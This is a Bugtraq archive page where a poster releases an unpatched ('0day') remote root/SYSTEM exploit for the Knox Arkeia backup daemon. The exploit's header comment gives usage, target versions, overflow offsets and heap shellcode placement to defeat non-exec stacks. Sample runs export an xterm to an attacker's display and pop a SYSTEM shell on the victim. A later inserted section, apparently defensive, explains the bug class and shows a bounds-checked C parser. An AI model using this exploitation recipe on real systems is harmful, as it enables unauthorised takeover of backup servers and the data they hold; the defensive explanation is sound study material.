Bugtraq mailing list archives
Knox Arkeia remote root/system exploit
From: "John Doe" <guldens111 () hotmail com>
Date: Fri, 18 Feb 2005 11:29:28 -0500
0day cuz i'm bored

/*
 * Knox Arkeia Server Backup
 * arkeiad local/remote root exploit
 * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE
 * Works up to current version 5.3.x
 *
 * ---------------
 *
 * Linux x86:
 * ./arksink2 <arkeia_host> <target_type> <display>
 *
 * Exports an xterm to the box of your choosing. Make sure to "xhost +" on
 * the box you're exporting to.
 *
 * A stack overflow is in the processing of a type 77 request. EIP is actually
 * overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
 * have to write past EIP and insert a "safe" value. Put this value behind your
 * NOP+sc return address so it doesn't mess with the sled.
 *
 * Since the buffer is so small, we initially send an invalid packet that ends
 * up on the heap a second before the overflow happens. If it is a high traffic
 * Arkeia server the heap might be a bit volatile, so play around with putting
 * nops+sc after the overwritten pointer. The heap method avoids non-exec stack
 * protection, however.
 *
 * Includes targets for RH8 and RH7.2
 *
 * [user@host user]$ ./prog 192.168.1.2 1 192.168.1.1:0
 * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
 * [*] Attacking LINUX system
 * [*] Exporting xterm to 192.168.1.1:0
 * [*] Connected to 192.168.1.2:617 NOP+shellcode socket
 * [*] Connected to 192.168.1.2:617 overflow socket
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Done, check for xterm
 *
 *
 * ---------------
 *
 * Windows x86:
 * ./prog <host> <target> <offset>
 *
 * Spawns a shell on port 80 of the remote host
 *
 * EIP is overwritten beginning with the 25th byte after the header. Since Windows
 * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
 * write an extra null past EIP. Another advantage here is that we can put all our
 * nops and shellcode in the same packet, but after the NULL. They will not be copied
 * onto the stack (and therefore not munge the pointer after it) but will remain
 * in memory as a raw packet. Fire up ollydbg, search for your nops and voila.
 *
 * [user@host user]$ ./arksink2 192.168.1.2 3 0
 * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
 * [*] Attacking Windows system
 * [*] Spawning shell on 192.168.1.2:80
 * [*] Connected to 192.168.1.2:617 overflow socket
 * [*] Sending overflow
 * [*] Attempting to get remote shell, try #0
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #1
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #2
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #3
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #4
 * [*] Success, enjoy
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>whoami
 * whoami
 * SYSTEM
 *
 * C:\WINNT\system32>
 *
 *
 * ---------------
 *
 */
Attachment: arksink2.c
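The post describes the bug class behind the exploit: a request body is copied into a small fixed-size stack buffer using a length the sender controls, so an oversized type 77 request overruns the buffer and the saved return address. The C below is an added illustration of that pattern and its fix, written for this archive page; it is not Arkeia's code, not the attached arksink2.c, and the wire layout (2-byte big-endian type, 2-byte big-endian body length, then body), the 64-byte buffer size and the function names are all assumptions chosen for the illustration. Every length is validated before anything is copied, and the comment marks the single missing check that turns the handler into the vulnerable variant.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed, hypothetical wire layout used only for this illustration:
 *   bytes 0-1: request type (big-endian), bytes 2-3: body length
 *   (big-endian), bytes 4..: body.  This is NOT Arkeia's real format. */
#define HDR_LEN      4
#define REQ_TYPE_77  77
#define BODY_MAX     64   /* size of the fixed stack buffer (assumed) */

enum parse_status {
    PARSE_OK               = 0,
    PARSE_ERR_SHORT_HEADER = 1,   /* fewer bytes than a header */
    PARSE_ERR_TRUNCATED    = 2,   /* claimed body longer than what arrived */
    PARSE_ERR_TOO_LONG     = 3,   /* claimed body longer than the buffer */
    PARSE_ERR_UNKNOWN_TYPE = 4
};

static uint16_t read_be16(const uint8_t *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Hardened handler for a type 77 request.  The vulnerable pattern the post
 * describes amounts to:
 *     uint8_t buf[BODY_MAX];
 *     memcpy(buf, pkt + HDR_LEN, claimed);   // trusts the sender's length
 * Without the PARSE_ERR_TOO_LONG check below, a body longer than BODY_MAX
 * overruns buf and whatever sits above it on the stack. */
enum parse_status handle_request(const uint8_t *pkt, size_t pkt_len,
                                 uint8_t *out, size_t *out_len) {
    if (pkt == NULL || pkt_len < HDR_LEN) return PARSE_ERR_SHORT_HEADER;
    uint16_t type    = read_be16(pkt);
    uint16_t claimed = read_be16(pkt + 2);
    if (type != REQ_TYPE_77) return PARSE_ERR_UNKNOWN_TYPE;
    if (claimed > BODY_MAX) return PARSE_ERR_TOO_LONG;        /* the missing check */
    if ((size_t)claimed > pkt_len - HDR_LEN) return PARSE_ERR_TRUNCATED;

    uint8_t buf[BODY_MAX];
    memcpy(buf, pkt + HDR_LEN, claimed);   /* now provably <= sizeof buf */
    if (out != NULL && out_len != NULL) {
        memcpy(out, buf, claimed);
        *out_len = claimed;
    }
    return PARSE_OK;
}

/* Builds a constructed sample request (header + body filled with 'fill').
 * Returns the packet length, or 0 if dst is too small. */
size_t build_request(uint8_t *dst, size_t dst_cap, uint16_t type,
                     uint16_t body_len, uint8_t fill) {
    if (dst_cap < HDR_LEN + (size_t)body_len) return 0;
    dst[0] = (uint8_t)(type >> 8);     dst[1] = (uint8_t)(type & 0xff);
    dst[2] = (uint8_t)(body_len >> 8); dst[3] = (uint8_t)(body_len & 0xff);
    memset(dst + HDR_LEN, fill, body_len);
    return HDR_LEN + body_len;
}

/* Convenience: build a type 77 request with the given body length and
 * return the handler's verdict as an int. */
int verdict_for_body_len(uint16_t body_len) {
    uint8_t pkt[HDR_LEN + 512];
    size_t n = build_request(pkt, sizeof pkt, REQ_TYPE_77, body_len, 0x41);
    uint8_t out[BODY_MAX];
    size_t out_len = 0;
    return (int)handle_request(pkt, n, out, &out_len);
}

/* Convenience: a packet whose header claims 'claimed' body bytes but whose
 * delivered length is only 'delivered' bytes in total. */
int verdict_for_truncated(uint16_t claimed, size_t delivered) {
    uint8_t pkt[HDR_LEN + 512];
    size_t n = build_request(pkt, sizeof pkt, REQ_TYPE_77, claimed, 0x41);
    if (delivered > n) delivered = n;
    return (int)handle_request(pkt, delivered, NULL, NULL);
}
```

The point for a reviewer of network-facing parsers is the order of the checks: the claimed length is compared against the destination buffer first and against the bytes actually received second, and the copy only happens once both hold. A handler that copies first and validates afterwards, or validates only against the received length, has the same exposure the post describes.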
Current thread:
- Knox Arkeia remote root/system exploit John Doe (Feb 19)
- Re: Knox Arkeia remote root/system exploit H D Moore (Feb 21)
- <Possible follow-ups>
- Re: Knox Arkeia remote root/system exploit Arnaud Spicht (Feb 23)